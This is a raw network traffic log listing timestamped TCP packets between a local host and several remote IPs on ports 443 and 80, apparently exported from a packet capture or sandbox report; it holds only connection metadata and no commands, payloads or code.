Dec 14, 2024 21:52:56.345160007 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:56.350332022 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:56.391334057 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:57.321681023 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:57.321861982 CET	443	49710	162.125.65.18	192.168.2.5
Dec 14, 2024 21:52:57.321908951 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:57.322309017 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:57.328717947 CET	49710	443	192.168.2.5	162.125.65.18
Dec 14, 2024 21:52:57.644000053 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:57.644058943 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:57.644321918 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:57.644711971 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:57.644727945 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:59.074377060 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:59.074568033 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:59.074594021 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:59.074700117 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:59.078389883 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:59.078398943 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:59.078797102 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:52:59.080713034 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:52:59.123358965 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.034909964 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.034945965 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.034965992 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.035198927 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.035217047 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.035379887 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.147994995 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.148066044 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.148147106 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.148147106 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.148166895 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.148225069 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.148231030 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.189043045 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.195276976 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.195373058 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.195458889 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.195458889 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.195472956 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.195725918 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.321924925 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.321979046 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.322030067 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.322047949 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.322082996 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.322115898 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.349355936 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.349400997 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.349467039 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.349481106 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.349509954 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.349580050 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.372677088 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.372720957 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.372776031 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.372787952 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.372833967 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.372909069 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.376388073 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.399849892 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.399899006 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.399936914 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.399951935 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.400196075 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.454561949 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.509794950 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.509835005 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.509876013 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.509884119 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.510050058 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.510056973 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.510138988 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.526242971 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.526283979 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.526324034 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.526329994 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.526376963 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.544229984 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.544253111 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.544560909 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.544570923 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.544617891 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.562311888 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.562366962 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.562413931 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.562421083 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.562587023 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.580331087 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.580375910 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.580466986 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.580466986 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.580475092 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.580526114 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.595957041 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.596003056 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.596043110 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.596057892 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.596116066 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.596116066 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.689007998 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.689083099 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.689153910 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.689153910 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.689172983 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.689277887 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.703360081 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.703393936 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.703582048 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.703599930 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.703758955 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.717278957 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.717307091 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.717386961 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.717396975 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.717508078 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.729504108 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.729521990 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.729592085 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.729598999 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.729657888 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.742340088 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.742358923 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.742440939 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.742446899 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.742610931 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.752728939 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.752746105 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.752821922 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.752826929 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.753117085 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.763736963 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.763755083 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.763812065 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.763817072 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.763854980 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.774856091 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.774882078 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.774950981 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.774959087 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.775026083 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.883538008 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.883560896 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.883642912 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.883667946 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.883852005 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.892312050 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.892332077 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.892460108 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.892484903 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.894896984 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.899949074 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.899966955 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.900047064 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.900064945 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.900108099 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.908745050 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.908766031 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.908821106 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.908837080 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.908864021 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.909077883 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.916923046 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.916943073 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.917051077 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.917073965 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.918870926 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.925635099 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.925652027 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.925733089 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.925753117 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.927860975 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.934410095 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.934428930 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.934673071 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.934693098 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.936904907 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.942075014 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.942094088 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.942208052 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:00.942234993 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:00.943054914 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.074556112 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.074582100 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.074717045 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.074739933 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.076869965 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.082055092 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.082077980 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.082304955 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.082328081 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.083667994 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.088720083 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.088742971 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.088944912 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.088958025 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.089020014 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.096340895 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.096363068 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.096581936 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.096592903 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.096642971 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.103584051 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.103602886 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.103677988 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.103692055 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.103713989 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.103993893 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.111016989 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.111038923 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.111196041 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.111208916 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.113411903 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.118537903 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.118561029 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.118629932 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.118635893 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.119266987 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.125267029 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.125286102 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.128026009 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.128047943 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.128851891 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.266602993 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.266628981 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.267225027 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.267250061 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.267343998 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.274184942 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.274207115 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.274265051 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.274283886 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.276896000 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.281759024 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.281776905 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.281843901 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.281857967 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.284919977 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.288402081 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.288423061 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.288657904 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.288664103 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.288913965 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.295510054 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.295533895 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.295645952 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.295665979 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.296994925 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.303189039 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.303208113 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.303349018 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.303368092 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.305212975 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.310715914 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.310734987 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.311332941 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.311350107 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.313014984 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.318191051 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.318206072 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.318329096 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.318341017 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.320919991 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.458802938 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.458827019 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.458873987 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.458894014 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.458925962 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.458947897 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.466190100 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.466214895 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.466320038 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.466320038 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.466344118 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.466438055 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.473819017 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.473845005 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.473915100 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.473932981 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.474069118 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.480492115 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.480516911 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.480581045 CET	443	49712	162.125.69.15	192.168.2.5
Dec 14, 2024 21:53:01.480627060 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.480803967 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:01.495187044 CET	49712	443	192.168.2.5	162.125.69.15
Dec 14, 2024 21:53:07.748306036 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:07.868526936 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:07.868613005 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:07.970525026 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:08.090315104 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:09.185436010 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:09.187659025 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:09.307840109 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:09.307974100 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:09.429302931 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:09.768117905 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:09.814019918 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:11.267301083 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:11.387103081 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:11.688016891 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:11.735770941 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:12.706018925 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:12.826626062 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:13.127912998 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:13.173275948 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:14.377101898 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:14.496898890 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:14.815396070 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:14.860835075 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:16.128252029 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:16.249638081 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:16.550652027 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:16.595170975 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:18.361160040 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:18.480952978 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:18.781970978 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:18.829663038 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:20.533094883 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:20.652923107 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:20.954123974 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:21.001454115 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:22.955244064 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:23.074945927 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:23.376236916 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:23.423333883 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:25.111656904 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:25.231492043 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:25.532464027 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:25.579540968 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:27.174078941 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:27.293847084 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:27.595084906 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:27.642062902 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:28.816303015 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:28.936016083 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:29.237035036 CET	80	49716	154.216.16.83	192.168.2.5
Dec 14, 2024 21:53:29.283659935 CET	49716	80	192.168.2.5	154.216.16.83
Dec 14, 2024 21:53:31.205353975 CET	49716	80	192.168.2.5	154.216.16.83
